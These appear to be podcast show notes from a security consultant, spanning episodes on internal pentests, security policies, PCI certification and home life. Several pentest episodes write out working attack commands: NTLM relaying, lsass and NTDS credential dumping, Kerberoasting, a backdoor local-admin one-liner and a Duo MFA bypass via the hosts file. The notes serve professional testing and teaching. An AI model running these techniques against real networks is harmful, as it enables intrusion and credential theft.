    • Testing for MS14-025 is easy with this site.
    • mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this:
    smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10

    Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin

    • I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ!

    • Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.

    • Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share

    • Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:

    pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt

    Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!


    7MS #422: Eating the Security Dog Food - Part 2 Jul 10, 2020

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me](https://safepass.me/?7ms422 for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today's episode continues the work we started in episode #419. We talk about the importance of having a good foundation of security documentation - including a reading out of the following policies:

    • Acceptable use
    • Data protection and privacy

    7MS #421: Cyber News - Verizon DBIR Edition Jul 01, 2020

    Today my pal Gh0sthax and I pick apart the Verizon Data Breach Investigations Report and help you turn it into actionable items so you can better defend your network!

    I'm especially excited because today's episode marks two important 7MS firsts:

    • The episode has been crafted by a professional podcast producer
    • The episode has been transcribed by a professional transcription service

    7MS #420: Tales of Internal Pentest Pwnage - Part 17 Jun 26, 2020

    Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever.

    I had to actually roll a fresh Kali VM to upload to the customer site, and I learned (the hard way) to make that VM disk as lean as possible. I got away with a 15 gig drive, and the OS+tools+updates took up about 12 gig.

    One of the biggest lessons I learned from this experience is to make sure that not only is your Kali box updated before you take it to a customer site (see this script), but you should make sure you install all the tool dependencies beforehand as well (specifically, Eyewitness, Impacket and MITM6).

    This pentest was also extremely time-boxed, so I tried to get as much bang out of it as possible. This included:

    • Capturing hashes with Responder
    • Checking for "Kerberoastable" accounts (GetUserSPNs.py -request -dc-ip x.x.x.x domain/user)
    • Check for MS14-025 (see this article)
    • Check for MS17-010 (nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue) and try this method of exploiting it
    • Check for DNS zone transfer (dnsrecon -d name.of.fqdn -t axf)
    • Test for egress filtering of ports 1-1024
    • Took a backup of AD "the Microsoft way" and then cracked with secretsdump:

    sudo python ./secretsdump.py -ntds /loot/Active\ Directory/ntds.dit -system /loot/registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile /loot/ad-pw-dump


    7MS #419: Eating the Security Dog Food Jun 17, 2020

    Today we're talking about eating the security dog food! What do I mean by that? Well, a lot of security companies I worked for in the past preached to clients about the importance of having a good security program, but didn't have one of their own! I'm trying to break that pattern now that I'm in a position to lead an information security program for 7MS.

    In today's episode we talk about getting your company started with a good set of infosec policies/procedures. First up is a "mothership" infosec policy with the following sub-policies inside it:

    • Acceptable Use
    • Data Protection and Privacy
    • Physical Security
    • Tools and Technology
    • Training and Awareness
    • Reporting

    Oh, and the song I jazz/scat/sang coming out of the jingle was If I Were a Dog


    7MS #418: Securing Your Mental Health Jun 11, 2020

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today's episode is all about mental health! I talk about some of my challenges with stress/anxiety and how I finally put on my big boy pants, dropped some misconceptions and decided to do something about it. Additionally, this episode contains references to:

    • Jon Secada
    • Arsenio Hall
    • Lone Wolf McQuade

    7MS #417: Vulnerability Scanning Tips and Tricks Jun 04, 2020

    Today's episode is all about getting the most value out of your vulnerability scans, including:

    • Why, IMHO you should only do credentialed scans

    • Policy tweaks that will keep servers from tipping over and printers from printing novels of gibberish ;-)

    • How to make your scan report more actionable and less unruly

    • Turning up logging to 11 (use with caution!)

    • A small tweak to an external scan policy that can result in the difference between a successful or failed scan

    • The nessusd.rules file is awesome for excluding specific hosts and services from your scans


    7MS #416: Pi-hole 5.0 May 28, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Today we're talking about some of my favorite features of Pi-hole 5.0. Including:

    • WARNING! WARNING! Upgrading from 4.x is a one-way operation!

    • Per-client blocking (you can setup, for example, a group machines called "kids" and apply specific domain block/allow lists and domains to them)

    • More granular detail (especially if there are issues) when blocklists get updated

    • Better, richer debug log output

    I also talk about a great companion for yor Pi-hole: a command-line Internet speed test! Hat tip to Javali over at the 7MS forums who told me about this.

    Additionally, I briefly mention "Hashy" (the nickname of my password cracking rig), give you some stay-at-home streaming TV show recommendations, and give you a quick house rebuild update!


    7MS #415: Cyber News May 21, 2020

    Today's episode kicks off a fun little experiment where my pal Joe Skeen and I cover some of the week's interesting security news stories, how they might affect you, and what you can do to make you and your company more secure. This week's stories:

    • Salt stack RCE (Daily Swig / Cyber Scoop)

    • Malware uses Corporate MDM as attack vector (Checkpoint)

    • Critical vulns in Sharefile (Citrix)

    • Shareholders sue Labcorp over their 'persistent' failure to secure data (Cyberscoop)


    7MS #414: Tales of Pentest Fail #4 May 14, 2020

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today I'm excited to share more tales of pentest FAIL with you. Today's tales include:

    1. Accidentally scanning assets that belong to an agency that nobody should be messing with

    2. Delivering reports with vulnerabilities from somebody else's network

    3. Why it's important to write a report more than 15 minutes before delivery

    4. Lessons learned from firing a disgruntled employee


    7MS #413: PCI Professional Certification (PCIP) - Part 3 May 07, 2020

    Hey everybody! I hope you're hanging in there during quarantine and staying healthy. Today is part 3 of our ongoing series all about becoming a PCIP. The good news is I'm finally, actually registered for the cert and have started diving into the training! So in today's episode I want to regurgitate some of what I'm learning to whet your appetite (or not) for this particular certification. Specifically, we cover:

    • The overview and objectives for being a PCIP (TLDR: PCIP does NOT replace QSA or ISA, but gives us a good understanding of how to protect payment card data)

    • How and why payment card data is leaked/stolen/breached - and then sold/monetized

    • The definition of some fundamental PCI acronym soup, including PCI DSS, PA-DSS and P2PE


    7MS #412: Tips for Working Safely and Securely From Home May 01, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    In today's episode we share some tips for working more safely and securely from home, which for many of us is our new office for the foreseeable future! Specifically, we cover:

    • Picking powerful passwords
    • Locking down your wifi
    • Defending your digital identity
    • Protecting your PC
    • Blocking icky stuff in your browser
    • Composing careful conference calls
    • Clicking links carefully

    I've also made this episode available in long-form blog here. Please feel free to share with anybody you think could benefit from the info!


    7MS #411: More Fun Stay-at-Home Security Projects Apr 24, 2020

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today is sort of a continuation of episode 407 where we covered four fun stay-at-home security projects including FoldingAtHome building a headless pi-hole, redoing your network with a Dream Machine, and enjoing some music via Zoom by way of Q.U.A.C.K.

    In this episode, we cover:

    • Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap!

    • CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle, and even better, they offer online testing during this stay-at-home time!

    • Pi-Holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSSEC. Just make sure your date/time settings on the box is correct, otherwise DNS will be pretty broken. I discuss a fix here on the 7MS forums....

    Read more at 7ms.us!


    7MS #410: PCI Professional Certification (PCIP) - Part 2 Apr 16, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    I’m gonna love you like coronavirus, I don’t know what else to say I’m gonna love you like coronavirus, I’m gonna stand 6 feet away Yes our love was meant to be, but it will have to wait until later Cuz I don’t wanna end up hooked up to a ventilator

    In today's episode I continue sharing my journey about becoming a PCIP. Spoiler alert: I'm still applying to even start training to be one. Here's what we'll cover:

    • The pentesting requirement 11.3 from PCI that kind of boggles my brain, and some advice I got from a PCI guru that helped clear things up for me. This video also helped me better understand requirement 11.3.

    • The super sucky couple of personal quarantine days I’ve had that include:

      • Cocoa that tastes like mint-flavored old lady diarrhea
      • Our fridge and freezer going ka-put
      • Exploding drinks in my fridge
      • A multi-thousand dollar repair on our new house that hasn’t even technically broken ground yet (!)

    7MS #409: PCI Professional Certification (PCIP) Apr 09, 2020

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today I'm starting a journey to become a PCI Professional (PCIP), and I'll be periodically updating the status of this journey on the 7MS forums.

    You don't need to be a QSA to get a PCIP, but you do need "2 years in IT or payments related background to have your application approved."

    The PCIP certification gives you (and I'm quoting from the PCI Web site):

    • Principles of PCI DSS, PA-DSS, PCI PTS, and PCI P2PE Standards
    • Understanding of PCI DSS requirements and intent
    • Overview of basic payment industry terminology
    • Understanding the transaction flow
    • Implementing a risk-based prioritized approach
    • Appropriate uses of compensating controls
    • Working with third-parties and service providers
    • How and when to use Self-Assessment Questionnaires (SAQs)
    • Recognizing how new technologies affect the PCI (e.g. virtualization, tokenization, mobile, cloud)

    The test costs + exam for a non-participating organization (like 7MS) is $2,500. You also have to re-up every 3 years for $260 (yay, another thing to have to pay for regularly).

    In the miscellany department:

    • Do you know someone who would enjoy a live 3-song acoustic concert? Check out my family's new ministry, Q.U.A.C.K. - Quarantined Unplugged Acoustic Concerts of Kindness.

    • A Webinar on creating kick-butt cred-capturing phishing portals is happening on Tuesday, April 14! Register here!


    7MS #408: Cell Phone Security for Tweenagers - Part 2 Apr 03, 2020

    This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to itpro.tv/7MS

    "I think of what the world could be If it did not have COVID-19 A million dreams is all it's gonna taaaaaaaaaaaaaaaake!"

    Today's episode is a continuation and update on the cell phone security for tweenagers episode from about a year ago. Specifically, I talk about:

    • How the cell phone contract I put together for my tweenager kind of blew up in my face
    • I'm the worst dad in the world because my wife and I enforced a "no screens" policy for a few weeks. We lived. Barely.
    • Apple Screen Time is your friend, and helps put some limits on iDevice use
    • The Dream Machine makes it easy to setup a segmented wireless network just for your kids. You can also "time box" their individual network to only broadcast at certain hours of the day
    • You can then apply OpenDNS to filter bad sites on just the kiddo network or ALL your networks
    • If you make a home backup/DR plan make sure it includes important stuff like: passwords to important things, as well as critical contacts like your tax prep person, financial advisor and subcontractors.

    More info at 7ms.us!


    7MS #407: Four Fun Stay-at-Home Security Projects Mar 26, 2020

    In today's episode I share four fun stay-at-home security projects - three with a security focus and one centered around music. Let's gooooooooo!

    FoldingAtHome

    The Folding At Home project helps use your GPU/CPU cycles for COVID-19 research. From the Web site:

    We need your help! Folding@home is joining researchers around the world working to better understand the 2019 Coronavirus (2019-nCoV) to accelerate the open science effort to develop new life-saving therapies. By downloading Folding@Home, you can donate your unused computational resources to the Folding@home Consortium, where researchers working to advance our understanding of the structures of potential drug targets for 2019-nCoV that could aid in the design of new therapies. The data you help us generate will be quickly and openly disseminated as part of an open science collaboration of multiple laboratories around the world, giving researchers new tools that may unlock new opportunities for developing lifesaving drugs.

    It's awesome! Since I run my cracking rig as a headless Linux install, I followed the advanced install and then used the command line options to run FAHClient standalone (only because personally I don't really love running extra, always-on services on any of my boxes).

    It looks like FAH is having a good problem in that there are more resource donors than research to number-crunch on! Keep tabs on the forums for up-to-date information.

    See more information at 7ms.us!


    7MS #406: Securing Your Family During and After a Disaster - Part 4 Mar 21, 2020

    This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to itpro.tv/7MS

    First and foremost, I hope you all are doing well and taking care of yourselves.

    Today's episode focuses on disasters, which is unfortunately a very appropriate topic. As a quick refresher, our family had a fire a few months ago. It sucked. I talked about the day of the fire in this episode then did a "how do we get back on the grid?" episode here and then answered some of your FAQs here.

    Regardless of if your DR plan includes fires, virus outbreaks, tornados or zombie attacks, it's important to have a solid plan for your family and business. So in today's episode I cover these main two topics:

    A DIY $500 NAS + Unlimited Cloud Backup Plan

    In trying to be more organized with my backup strategy, I set out to create a new backup plan with the following criteria:

    • Priced at ~$500
    • One on-prem array
    • Encrypted at rest
    • Backs up to cloud with encryption key I control
    • Unlimited scalable storage

    I found my solution using this awesome video but I need to warn you about something right off the bat: the config in this video and in today's episode is not supported by CrashPlan because CP doesn't have a native backup agent that will run on the Synology NAS (at the time of this writing, anyway). With that said, here's the grocey list of things that make up my backup rig:

    (See more info on the show notes for todya's episode at 7ms.us)


    7MS #405: Tales of Internal Pentest Pwnage - Part 16 Mar 12, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Today's episode of pentest pwnage is the (hopefully) exciting conclusion to this episode. Last we left this pentest, we ran into some excellent blue team defenses, including:

    • MFA on internal servers (which we bypassed)
    • Strong passwords
    • Limited vulnerable protocols (LLMNR/Netbios/etc) available to abuse for cred-capturing
    • Servers that were heavily firewalled off from talking SMB to just any ol' subnet nor the Interwebs (here's a great video on how to fine-tune your software firewall chops)

    In today's episode we talk about:

    • How maybe it's not a good idea to make computer go completely "shields down" during pentests

    • Being careful not to fat-finger anything when you spawn cmd.exe with creds, like

    runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe"
    • Being careful not to fat-finger anything when using CrackMapExec

    • How fundamental and really effective blue team controls (such as the ones mentioned above) can really make pentesting a headache!

    • How you should be careful when spawning shells with MultiRelay (part of Responder is it creates new services on your victim machine

    Has the 7MS podcast helped you in your IT and security career? Please consider supporting us!


    7MS #403: 7MOOMAMA - Juice Shop Song + Backdoors and Breaches Jingle Mar 09, 2020

    Today's slightly off-topic episode kicks off a new tag called 7MOOMAMA. That stands for 7 Minutes of Only Music and Miscellaneous Awesomeness.

    To kick things off, I'm super excited to share with you two new security-themed songs for some of my favorite security things! They are:

    • Backdoors and Breaches - my favorite incident response card game.

    • OWASP Juice Shop - my favorite vulnerable Web application.

    Enjoy!

    Backdoors and Breaches

    Backdoors and Breaches I love the way teaches me to think about security controls And their proper placement

    Backdoors and Breaches I can’t wait to blow my paycheck just to get myself a game deck and then move Out of my mother’s basement

    Soon I’ll be sittin’ down and playing it with my red and blue teams Or John and gang at Black Hills Info Security And when I go to bed tonight I know what’s gonna fill my dreams Backdoors and Breaches

    Juice Shop

    VERSE 1 When you want to shop online then you had better be sure The experience is safe and also secure Don't want to let no SQLi or cross-site scripting ruin your day No, you want to break into a joyous song and say:

    CHORUS 1 Juice Shop! Juice Shop! You can order tasty beverages in any quantity Juice Shop! Juice Shop! Just don't test the site with Burp Suite or you won't like what you see

    VERSE 2 Now if you're feeling kinda sneaky and you're inclined to explore You might find inside the Juice Shop...a hidden score board It will point you towards a vuln'rability or maybe two And when you're done you'll say, "This site should get a code review!"

    CHORUS 2 Juice Shop! Juice Shop! It has got more holes then a warehouse filled with gallons of Swiss cheese Juice Shop! Juice Shop!

    ...finish the songs at 7ms.us


    7MS #402: Interview with Matt Duench of Arctic Wolf Feb 26, 2020

    Today I'm joined by Matt Duench (LinkedIn / Twitter), who has a broad background in technology and security - from traveling to over 40 countries around the world working with telecom services, to his current role at Arctic Wolf where he leads product marketing for their managed risk solution.

    Matt chatted with me over Skype about a wide variety of security topics, including:

    • Corporate conversations around security have changed drastically in such a short time - specifically, security is generally no longer perceived as a cost center. So why are so many organizations basically still in security diapers as far as their maturity?

    • Why is it still so hard to find “bad stuff” on the network?

    • What are some common security mistakes you wish you could wave a magic wand and fix for all companies?

    • The beauty of the CIS Top 20 and how following even the top 5 controls can stop 85% of attacks.

    • Low-hanging hacker fruit that all organizations should consider addressing, such as:

      • Disabling IPv6
      • Using a password manager
      • Turning on multi-factor authentication
      • Don’t write down your passwords!
      • Have a mail transport rule that marks external mail as “EXTERNAL” so it jumps out to people
      • Consider an additional rule to stop display name spoofing (h/t to Rob on Slack!)
    • Why you should be concerned about corporate account takeover, and how to better protect yourself and your company against this attack vector

    I also asked Matt a slew of questions that many of you submitted via Slack:

    More info under the show notes for this episode at 7ms.us!


    7MS #401: Tales of Internal Pentest Pwnage - Part 15 Feb 21, 2020

    It’s episode 401 and we’re having fun, right? Some things we cover today:

    • The Webinar version of the DIY Pwnagotchi evening will be offered in Webinar format on Tuesday, March 10 at 10 a.m.

    • A quick house fire update - we’re closer to demolition now!

    • I finally got a new guitar!

    Besides that, I’ve got a wonderful tale of pentest pwnage for you. Warning: this is a TBC (to be continued) episode in that I don’t even know how it will shake out. I’m honestly not sure if we’ll get DA! Here are the highlights:

    • I think in the past I might've said unauthenticated Nessus scans weren't worth much, but this test changed my mind.

    • If you can't dump local hashes with CrackMapExec, try SecretsDump!

    ./secretsdump.py -target-ip {IP of target machine} localhost/{username}@{target IP}
    • If you're relaying net user commands (or just typing them from a relayed shell), this one-liner is a good way to quickly add your user to local admins and the Remote Desktop Users group:
    net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add
    • Trying to RDP into a box protected with Duo MFA? If you can edit the c:\windows\system32\drivers\etc\hosts file, you might be able change the Duo authentication server from api-xxxxxxx.duosecurity.com to 127.0.0.1 and force authenetication to fail open! Source: Pentest Partners

    • In general, keep an eye on CrackMapExec's output whenever you use the '-x' flag to run commands. If the system is "hanging" on a command for a while and then gives you NO output and just drops you back at your Kali prompt, the command might not be running at all due to something else on the system blocking your efforts.

    More on today's show notes at 7ms.us!


    7MS #400: Tales of Internal Pentest Pwnage - Part 14 Feb 14, 2020

    Wow, happy 400th episode everybody! Also, happy SIXTH birthday to the 7MS podcast!

    Today I've got a really fun tale of internal network pentest pwnage to share with you, as well as a story about a "poop-petrator." Key moments and takeaways include:

    • Your target network might have heavy egress filtering in place. I recommend doing full apt-get update and apt-get upgrade and grabbing all the tools you need (may I suggest my script for this?).

    • If the CrackMapExec --sam flag doesn't work for you, give secretsdump a try, as I ran it on an individual Win workstation and it worked like a champ!

    • If the latest mimikatz release doesn't rip out passwords for you, try the release from last August. For whatever reason (thanks 0xdf) for the tip!

    • If your procdumps of lsass appear to be small, endpoint protection might be getting in the way! You might be able to figure out what's running - and stop the service(s) - with CrackMapExec and the -x 'tasklist /v' flag.

    • If you need to bypass endpoint protection, don't be afraid to go deep into the Google search results. Unfortunately, I think that's all I can say about that, as vendors seem to get snippy about talking about bypasses publicly.

    Has 7MS helped you in your IT and security career? Please consider buying me a coffee!


    7MS #399: Baby's First Password Cracking Rig Feb 07, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Believe it or not I'm pentesting your stuff I never thought I could feel so free-hee-hee I compromised one of your Domain Admins Who it could be? The guy with "Password123"

    In today's episode we're talking all about building your own password-cracking rig! "Wait a minute!" you say. "Are you abandoning the Paperspace password cracking in the cloud thing?" Nope! I'm just bringing that methodology "in house" for a little better opsec and also because last year on Paperspace I spent thousands of dollars.

    First things first - here's the hardware I ended up with:

    • Inland Premium 512GB SSD 3D NAND M.2 2280 PCIe NVMe 3.0 x4 Internal Solid State Drive
    • [Intel Core i5-9400F Desktop Processor 6 Core up to 4.1GHz Without Processor Graphics LGA1151 (Intel 300 Series chipset)](https://www.microcenter.com/product/602028/intel-core-i5-9400f-desktop-processor-6-core-up-to-41ghz-without-processor-graphics-lga1151-(intel-300-series-chipset)
    • ASUS ROG Strix Z390-H Gaming LGA 1151 ATX Intel Motherboard
    • EVGA SuperNOVA 1200P2 1200 Watt 80 Plus Platinum Modular Power Supply

    For a full shopping list and more notes, head to 7ms.us!


    7MS #398: Securing Your Network with Raspberry Pi Sensors Jan 30, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    I'll be your Raspberry Pi zero baby I don't know what else to say I'll keep bad stuff off of your network I will do it both night and day

    Today I talk about four cool Raspberry Pi projects that will help you better secure your network.

    First off though, I give a shout out to my son Atticus who I want to be more like because he doesn't give a rat's behind what other people think of him!

    The cool Pi-based projects I love are:

    1. Pi-Hole is a black hole for Internet advertisements and it literally installs with just a few commands:
    git clone --depth 1 https://github.com/pi-hole/pi-hole.git Pi-hole cd "Pi-hole/automated install/" sudo bash basic-install.sh
    1. Pwnagotchi is a cute little devil who exists only to capture WPA handshakes! I did a whole episode on it, and invite you to build a DYI Pwnagotchi with me live on Feb 10.

    2. How to use a Raspberry Pi as a Network Sensor is a really cool Webinar I watched (brought to us by our pals at BHIS and ActiveCountermeasures) that shows you how to use a Pi with an external drive to install Bro and other tools to help you find bad stuff on your network.

    3. CanaryPi is freaking sweet and can detect NBNS/LLMNR/mDNS spoofing as well as port-scanning, yeah baby! And coming soon (hopefully): mitm6 detection!

    Has 7MS helped you in your IT and security career? Please consider buying me a coffee!


    7MS #397: OPSEC Tips for Security Consultants Jan 23, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    I'm working on a new security song called Don't Let the Internet Get You Down, and the chorus will go something like this:

    Don't let the Internet get you down It's full of trolls and 10 year olds and adolescent clowns So let their words roll off of you, like water off a duck To prove to them that you don't give a darn

    On a more serious note, here are some opsec tips that hopefully will help you as a security consultant:

    1. Good contracts - make sure your SOWs have lots of CYA verbiage to protect you in case something breaks, your assessment schedule needs to be adjusted, etc. Also, consider verbiage that says you'll only retain client testing artifacts (hashes, vuln scans, etc.) for a finite amount of time.

    2. Scope - make sure you talk about scope, both in written and verbal form, often! Also, a Nessus scanning tip: use the nessusd.rules file to not scan any IPs the client doesn't want touched. That way Nessus won't scan those IPs even if you try to force it to!

    3. Send information to/from clients safely - consider forcing MFA on your file-sharing portals, as well as a retention policy so that files "self destruct" after X days.

    ....and more on today's episode (see 7ms.us for more show notes)!

    Has 7MS helped you in your IT and security career? Please consider buying me a coffee!


    7MS #396: Tales of Internal Pentest Pwnage - Part 13 Jan 15, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    In last week's episode I was very close to potentially synching up some very sensitive data with my super secret back door account. In this episode, we resolve the cliffhanger and talk about:

    • How I don't remember lyrics or titles to songs - even the ones I love - such as My Prerogative. That's why Jack Black is my spirit animal, and he's awesome for singing Elton John songs right to Elton John

    • If you get DA (relatively) quickly, consider pivoting to a network assessment and crack hashes with secretsdump, test egress filtering, run Network Detective and more

    • Once you've cracked all the hashes you can, run it through hashcombiner and Pipal like this:

    python /opt/hashcombiner/hash_combiner.py user_hash hash_password | sort > combined.txt cut -d ':' -f 2 combined.txt > passwords.txt ruby /opt/pipal/pipal.rb passwords.txt > pip.txt
    • The procdump + lsass trick is still really effective (though sometimes AV gobbles it)

    (See full show notes at 7ms.us!)


    7MS #395: Tales of Internal Pentest Pwnage - Part 12 Jan 09, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    In today's tale of pentest pwnage I got to try some tools and tricks for the first time! Here are the key points/takeaways from this test:

    • It's great to have additional goals to achieve in a network pentest outside of just "get DA"

    • PayloadsAllTheThings has a great section on Active Directory attacks

    • Using mitm6 and ntlmrelayx is now my new favorite thing thanks to The Cyber Mentor's fantastic video showing us exactly how to launch this attack!

    • If you're scared of running mitm6 and accidentally knocking folks off your network, setup your Kali box to reboot in a few minutes just to be safe. Do something like:

    shutdown -r +15 "Rebooting in 15 minutes just in case I mitm6 myself right off this box!"

    • When mitm6+ntlmrelay dumps out a series of html/json files with lists of users, groups, etc., read through them! Sometimes they can include treats...like user passwords in the comment fields!

    • Use crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u username -p password to verify if your domain creds are good!

    There are a bunch of people I need to thank because their tools/encouragement/advice played a part in making the test successful. See today's show notes on 7ms.us for more info!


    7MS #394: DIY Pwnagotchi Jan 03, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Sung to the tune of "Do You Wanna Build a Snowman"

    Do you wanna build a Pwnagotchi? Even though you thought you never would? I really hope mine doesn't ever break It grabs wifi handshakes It does it really good!

    Today's episode is all about Pwnagotchi, a cute little device whose sole purpose in life is to gobble WPA handshakes! Check out today's episode to learn more about the device (as well as some pwn-a-gotchas that you should be aware of), and then come to the next 7MS user group meeting to build your own! If you can't make this meeting I'll also do a Webinar version of the presentation - likely in February or March, so stay tuned to our Webinars page.

    At the end of today's episode I talk about my troll foot. I fractured my ankle on Christmas Eve and was basically this lady. At the end of the day I received an avulsion fracture and it kinda made my Christmas stink. But 2020 is gonna absolutely rip, friends!


    7MS #393: Interview with Peter Kim Dec 26, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Peter Kim of The Hacker Playbook series joins me today to talk about all things hacking! Peter runs a popular west coast hacker meetup, and I was fortunate enough to attend his Real World Red Team training, which I wrote a review about here. Peter sat down with me over Skype to talk about:

    • The origin story of The Hacker Playbook series (btw please buy it, don't steal it! :-)
    • How do you balance work and family life when trying to pwn all the things and have a personal life and significant other?
    • How do you break into security when your background is in something totally different, like a mechanic, artist or musician?
    • What are some good strategies when approaching a red team engagement - do you always start "fresh" from the perimeter? Do you assume compromise and throw a dropbox on the network? Some combination of both?
    • What are some other low-hanging fruit organizations can use to better defend their networks?
    • Do you run across some of these good defenses - like honeypots - in your engagements?
    • If you could put on a wizard hat and solve one security problem (be it technical, personnel or something else) what would it be?

    ...and more!


    7MS #392: LAPS Reloaded Dec 19, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    Today's episode is all about LAPS - Microsoft's Local Administrator Password solution. In a nutshell, LAPS strengthens and randomizes the local administrator password on the systems across your enterprise. We talked about it way back in episode 252 but figured it was worth a revisit because:

    • It's awesome

    • It's free

    • People still haven't heard of it when I share info about it during conference talks!

    • I've got a full write-up of how to install LAPS here

    • At a recent conference people asked me two awesome edge case questions:

      • What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it?

      • What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?


    7MS #391: Securing Your Family During and After a Disaster - Part 3 Dec 12, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    This is part three of this series - part 1 talked about a fire that destroyed my family's home and vehicles, and part 2 was about how to get "back on the grid" and start working with the insurance machine to find a new "normal."

    Today, I want to answer some burning questions many of you have been asking:

    • Have you hit rock bottom yet? (Spolier alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain)

    • How long to you get to keep rental cars before you have to replace your permanent vehicles?

    • Do you have to stay in a hotel the whole time your house is rebuilt?

    • What about if you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt?

    • What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?


    7MS #390: Tales of Internal Network Pentest Pwnage - Part 11 Dec 06, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover:

